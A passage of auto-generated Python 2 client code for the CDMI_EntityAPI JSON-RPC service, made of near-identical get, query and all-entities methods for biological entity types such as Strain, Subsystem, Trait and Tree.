arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SampleAnnotation',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SampleAnnotation(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SampleAnnotation',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Scenario(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Scenario',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Scenario(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Scenario',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Scenario(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Scenario',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Series(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Series',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Series(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Series',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Series(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Series',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Source(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Source',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Source(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Source',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Source(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Source',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Strain(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Strain',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Strain(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Strain',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Strain(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Strain',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_StudyExperiment(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_StudyExperiment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_StudyExperiment(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_StudyExperiment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_StudyExperiment(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_StudyExperiment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Subsystem(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Subsystem',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Subsystem(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Subsystem',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Subsystem(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Subsystem',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_SubsystemClass(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SubsystemClass',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SubsystemClass(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SubsystemClass',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SubsystemClass(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SubsystemClass',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TaxonomicGrouping(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TaxonomicGrouping',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TaxonomicGrouping(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TaxonomicGrouping',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TaxonomicGrouping(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TaxonomicGrouping',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TimeSeries(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TimeSeries',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TimeSeries(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TimeSeries',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TimeSeries(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TimeSeries',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Trait(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Trait',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Trait(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Trait',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Trait(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Trait',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Tree(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Tree',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Tree(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Tree',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Tree(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Tree',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TreeAttribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TreeAttribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
